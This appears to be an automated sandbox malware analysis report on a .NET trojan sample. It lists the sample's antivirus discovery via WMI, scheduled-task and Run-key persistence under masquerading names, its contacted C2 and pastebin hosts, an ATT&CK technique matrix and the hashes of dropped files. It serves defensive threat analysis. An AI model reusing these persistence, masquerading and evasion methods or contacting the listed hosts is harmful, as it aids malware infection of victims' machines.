Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeQueries volume information: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe VolumeInformation
Source: C:\Users\user\xdwdPutty.exeQueries volume information: C:\Users\user\xdwdPutty.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeQueries volume information: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe VolumeInformation
Source: C:\Users\user\xdwdPutty.exeQueries volume information: C:\Users\user\xdwdPutty.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeQueries volume information: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe VolumeInformation
Source: C:\Users\user\xdwdPutty.exeQueries volume information: C:\Users\user\xdwdPutty.exe VolumeInformation
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: ptKNiAaGus.exe, 00000000.00000002.3315461823.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000011.00000002.1175503015.0000000001490000.00000004.00000020.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000011.00000002.1198001960.000000001C007000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3315892006.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3346481631.000000001B90E000.00000004.00000020.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1174194771.000000000135C000.00000004.00000020.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1190784165.000000001BD6A000.00000004.00000020.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1191163974.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1258532267.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1286934423.0000000000F6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 331 Windows Management Instrumentation; 1 Native API; 1 Scheduled Task/Job; 2 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; 31 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 12 Process Injection; 1 Scheduled Task/Job; 31 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Obfuscated Files or Information; 1 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 121 Masquerading; 1 Modify Registry; 251 Virtualization/Sandbox Evasion; 12 Process Injection
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 File and Directory Discovery; 123 System Information Discovery; 441 Security Software Discovery; 2 Process Discovery; 251 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Web Service; 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
[Behavior graph: ID 1466956, sample ptKNiAaGus.exe, start date 03/07/2024, architecture WINDOWS, score 100]

Source | Detection | Scanner | Label
ptKNiAaGus.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno
ptKNiAaGus.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe | 100% | Avira | TR/Crypt.OPACK.Gen
C:\Users\user\xdwdPutty.exe | 100% | Avira | TR/Crypt.OPACK.Gen
C:\Users\user\Videos\xdwdPutty.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
q-policies.gl.at.ply.gg | 147.185.221.18 | true | true | | unknown
pastebin.com | 104.20.3.235 | true | true | | unknown
icanhazip.com | 104.16.185.241 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://pastebin.com/raw/LmbvnzZM | false | Avira URL Cloud: safe | unknown
http://icanhazip.com/ | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.20.3.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
104.16.185.241 | icanhazip.com | United States | 13335 | CLOUDFLARENETUS | false
147.185.221.18 | q-policies.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | true
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1466956
        Start date and time:2024-07-03 15:48:05 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 16m 0s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
        Run name:Suspected VM Detection
        Number of analysed new started processes analysed:158
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Sample name:ptKNiAaGus.exe
        Detection:MAL
        Classification:mal100.troj.evad.winEXE@196/11@4/3
        EGA Information:
        • Successful, ratio: 11.1%
        HCA Information:
        • Successful, ratio: 60%
        • Number of executed functions: 451
        • Number of non-executed functions: 2
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Override analysis time to 240000 for current running targets taking high CPU consumption
        • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, WmiApSrv.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): fs.microsoft.com
        • Execution Graph export aborted for target pto2q1ow.nf5.exe, PID 10036 because it is empty
        • Execution Graph export aborted for target xdwdMicrosoft Paint.exe, PID 8500 because it is empty
        • Execution Graph export aborted for target xdwdMicrosoft Paint.exe, PID 9720 because it is empty
        • Execution Graph export aborted for target xdwdMicrosoft Paint.exe, PID 9912 because it is empty
        • Execution Graph export aborted for target xdwdPutty.exe, PID 10220 because it is empty
        • Execution Graph export aborted for target xdwdPutty.exe, PID 2812 because it is empty
        • Execution Graph export aborted for target xdwdPutty.exe, PID 8872 because it is empty
        • Execution Graph export aborted for target z4wwumki.3zg.exe, PID 6424 because it is empty
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
        • Report size getting too big, too many NtEnumerateKey calls found.
        • Report size getting too big, too many NtOpenKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: ptKNiAaGus.exe
Time | Type | Description
09:50:07 | API Interceptor | 8516862x Sleep call for process: ptKNiAaGus.exe modified
09:50:30 | API Interceptor | 9x Sleep call for process: powershell.exe modified
09:50:32 | API Interceptor | 6305597x Sleep call for process: pto2q1ow.nf5.exe modified
09:50:32 | API Interceptor | 3x Sleep call for process: xdwdMicrosoft Paint.exe modified
09:50:36 | API Interceptor | 2x Sleep call for process: z4wwumki.3zg.exe modified
09:50:38 | API Interceptor | 6x Sleep call for process: xdwdPutty.exe modified
15:50:07 | Task Scheduler | Run new task: Avast Antivirus path: C:\Users\user\xdwdPutty.exe
15:50:30 | Task Scheduler | Run new task: Google Drive path: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe
15:50:33 | Task Scheduler | Run new task: OpenOffice path: C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe
15:50:34 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run xdwdsystegregre C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe
15:50:43 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run xdwdsystegregre C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe
15:50:58 | Task Scheduler | Run new task: Corel PaintShop Pro path: C:\Users\user\Videos\xdwdPutty.exe
15:51:01 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Visual Studio C:\Users\user\Videos\xdwdPutty.exe
15:51:09 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Visual Studio C:\Users\user\Videos\xdwdPutty.exe
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        104.20.3.235New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
        • pastebin.com/raw/NsQ5qTHr
        Invoice-883973938.jsGet hashmaliciousWSHRATBrowse
        • pastebin.com/raw/NsQ5qTHr
        2024 12_59_31 a.m..jsGet hashmaliciousWSHRATBrowse
        • pastebin.com/raw/NsQ5qTHr
        PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
        • pastebin.com/raw/NsQ5qTHr
        104.16.185.241bJLd0SUHfj.exeGet hashmaliciousUnknownBrowse
        • icanhazip.com/
        PGjIoaqfQY.exeGet hashmaliciousUnknownBrowse
        • icanhazip.com/
        Kh7W85ONS7.exeGet hashmaliciousAsyncRAT, DarkTortilla, StormKitty, WorldWind StealerBrowse
        • icanhazip.com/
        w5APKwp5DD.exeGet hashmaliciousAsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind StealerBrowse
        • icanhazip.com/
        wssvZm9dNK.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
        • icanhazip.com/
        setup.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
        • icanhazip.com/
        INQUIRY.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
        • icanhazip.com/
        Order Inquiry.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
        • icanhazip.com/
        Hniunx426q.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRAT, WorldWind Stealer, XWormBrowse
        • icanhazip.com/
        171820386548cbbea4ed1903ede58ab5c6cfb71df0faa52822ed84c4f21b423dbf37ee3c0d777.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
        • icanhazip.com/
        147.185.221.18beK7HmoXro.exeGet hashmaliciousUnknownBrowse
          bJLd0SUHfj.exeGet hashmaliciousUnknownBrowse
            PGjIoaqfQY.exeGet hashmaliciousUnknownBrowse
              V6363OW8Rh.exeGet hashmaliciousXWormBrowse
                x6221haMsm.exeGet hashmaliciousUnknownBrowse
                  a.exeGet hashmaliciousUnknownBrowse
                    wzcstatus.exeGet hashmaliciousUnknownBrowse
                      wzcsapi.exeGet hashmaliciousXWormBrowse
                        bKwh3xPyu9.exeGet hashmaliciousQuasarBrowse
                          pSZnQqzOqX.exeGet hashmaliciousXWormBrowse
                            No context
                            Process:C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe
                            File Type:CSV text
                            Category:dropped
                            Size (bytes):871
                            Entropy (8bit):5.36845336122342
                            Encrypted:false
                            SSDEEP:12:Q3La/KDLI4MWuPyEsOKbbDLI4MWuPOKMAKhap+92n4MNQpVhU9tWzAbDLI4MNux+:ML9E4KaCKDE4KGKMAKh6+84xpcKsXE4w
                            MD5:15332C93136041700B0E3D5AEB01CFCE
                            SHA1:77EBA09260200C3EA967778E460A7A0D83A2E152
                            SHA-256:5B95602CCE052DF6412A02E94AAC5326A41419C13C56B1FE0CE9389D3CB77D30
                            SHA-512:419B6BCD31744FE9494F0FB8CF0AA57C59E338898BD5A9832A7C59BE5E478A27D53D40861AF2F4ED38426574781E2DA38237805CB765C7BD582FB8F4C547102A
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d1b08a492d712e019f310913d82efb4d\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\782dd7dd89e97af687ff0bdfb301ea5f\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\d168bb79d8c202ee2de4b8f1cab215dd\Microsoft.VisualBasic.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\3a54af634388e6223cd280a434ab6a59\System.Management.ni.dll",0..
                            Process:C:\Users\user\xdwdPutty.exe
                            File Type:CSV text
                            Category:dropped
                            Size (bytes):871
                            Entropy (8bit):5.36845336122342
                            Encrypted:false
                            SSDEEP:12:Q3La/KDLI4MWuPyEsOKbbDLI4MWuPOKMAKhap+92n4MNQpVhU9tWzAbDLI4MNux+:ML9E4KaCKDE4KGKMAKh6+84xpcKsXE4w
                            MD5:15332C93136041700B0E3D5AEB01CFCE
                            SHA1:77EBA09260200C3EA967778E460A7A0D83A2E152
                            SHA-256:5B95602CCE052DF6412A02E94AAC5326A41419C13C56B1FE0CE9389D3CB77D30
                            SHA-512:419B6BCD31744FE9494F0FB8CF0AA57C59E338898BD5A9832A7C59BE5E478A27D53D40861AF2F4ED38426574781E2DA38237805CB765C7BD582FB8F4C547102A
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d1b08a492d712e019f310913d82efb4d\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\782dd7dd89e97af687ff0bdfb301ea5f\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\d168bb79d8c202ee2de4b8f1cab215dd\Microsoft.VisualBasic.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\3a54af634388e6223cd280a434ab6a59\System.Management.ni.dll",0..
                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe
                            File Type:CSV text
                            Category:dropped
                            Size (bytes):871
                            Entropy (8bit):5.36845336122342
                            Encrypted:false
                            SSDEEP:12:Q3La/KDLI4MWuPyEsOKbbDLI4MWuPOKMAKhap+92n4MNQpVhU9tWzAbDLI4MNux+:ML9E4KaCKDE4KGKMAKh6+84xpcKsXE4w
                            MD5:15332C93136041700B0E3D5AEB01CFCE
                            SHA1:77EBA09260200C3EA967778E460A7A0D83A2E152
                            SHA-256:5B95602CCE052DF6412A02E94AAC5326A41419C13C56B1FE0CE9389D3CB77D30
                            SHA-512:419B6BCD31744FE9494F0FB8CF0AA57C59E338898BD5A9832A7C59BE5E478A27D53D40861AF2F4ED38426574781E2DA38237805CB765C7BD582FB8F4C547102A
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d1b08a492d712e019f310913d82efb4d\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\782dd7dd89e97af687ff0bdfb301ea5f\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\d168bb79d8c202ee2de4b8f1cab215dd\Microsoft.VisualBasic.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\3a54af634388e6223cd280a434ab6a59\System.Management.ni.dll",0..
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):0.34726597513537405
                            Encrypted:false
                            SSDEEP:3:Nlll:Nll
                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                            Malicious:false
                            Preview:@...e...........................................................
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):739685376
                            Entropy (8bit):0.006637695644790447
                            Encrypted:false
                            SSDEEP:
                            MD5:BFC9AA287C7AFD68C03066A887B123AE
                            SHA1:3819C6679BBA7ABC77149C0760022B8721CC8FEC
                            SHA-256:0BCB524EAA5BE4D110C59D8AD0268187D5F1F283268B43A95ED49642FD8F7CC4
                            SHA-512:9D42F3D22F7F47F5EAD5585D12CC3C892997C4D1BA4CF081F4EAE404563EFECCDDB29710206A4C7DD1A67FD8F66D1120E19A66B19C2E9DE4C5B738B63D2A125A
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):439296
                            Entropy (8bit):4.903374553746864
                            Encrypted:false
                            SSDEEP:3072:6fimTeNby2U0j0JvuhTNeN3w/jhlhE1Z8Nig9zEbv8+bigx1XXbP1XcPgmzGTQc:nUeNpqYe6VlWT8b9zEbPb3nHbVj
                            MD5:D843D2F7E8D6DD8B1490C0EABA86F5CC
                            SHA1:10C77F4BADE67D5B918DF573C4A2D15F1E829186
                            SHA-256:F9D2399892094D566D8C0C0841A2ED5EE520D892A5565D12B315E1058B968334
                            SHA-512:E1A9B2DB4F8F1BB6D3A7FED50F555B3082109E937015B34023483746BF8EEBE9D043E0DCA57022AD97E538CBFFDF9B0919C0403A49F864496F9A1B5EDA50A7F5
                            Malicious:true
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Process:C:\Users\user\Desktop\ptKNiAaGus.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):740754944
                            Entropy (8bit):0.008367695155420383
                            Encrypted:false
                            SSDEEP:
                            MD5:8BBEF39EBACCBCCEF26BE354545B98BD
                            SHA1:7CA909801E7CBDA26A80AB62FCB0E64A14F2FDD8
                            SHA-256:BC7E76E22B7E37571D5DF21EE886939DDACD95DCF3FEAEF8B2498369CF30965E
                            SHA-512:935933D78FF0D1E8B86B47E52D75B56514C70D418374F400E833BDFA50167AA7862A46262C2D1A238C5AF1CD0B39B90FEB0C6AC7F517747E4C84C2704BA04ADB
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):5.852068444021136
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            • Win32 Executable (generic) a (10002005/4) 49.75%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Windows Screen Saver (13104/52) 0.07%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            File name:ptKNiAaGus.exe
                            File size:460'288 bytes
                            MD5:4410af8bec1266d76029f9bb042c6a73
                            SHA1:632a7eadf55f09d8ba0d9641ae1adaa921aaf5fa
                            SHA256:04783068a4bc4ce6a3f2e8ed35d40528b84ddb9c1a0ad2f39fb5634eb5f8295a
                            SHA512:fc3e2690c2e7b90c966d80e4fe928e3bc4c60d637c7e435ddf93f90974bb9ab3b37610ef5f27d7d0da6440514d79a5005d2734123d4b92e1b53891860454c5c2
                            SSDEEP:6144:Tyin4KCcmF9+h1qB64e6VlWT8b9smCJgBf8+gllo1bXrGxNSlAdfpfEKc7T:TyDtceUHsPVle8KYB5/rG+WdfpcKc
                            TLSH:E7A4A20CFE91E805CE1E3D77CFE614104B7125C22E2292563159AFFE8B6937668E267C
                            Icon Hash:90cececece8e8eb0
                            Entrypoint:0x47182e
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0xF5FE416F [Wed Oct 13 03:20:15 2100 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                            Instruction
                            jmp dword ptr [00402000h]
                            add byte ptr [eax], al
                            Name | Virtual Address | Virtual Size | Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x717e0 | 0x4b | .text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x72000 | 0x68c | .rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x74000 | 0xc | .reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                            .text | 0x2000 | 0x6f834 | 0x6fa00 | f7929da36e2e77b7120c5ecfe403afb3 | False | 0.48387414263717804 | data | 5.859433184339624 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
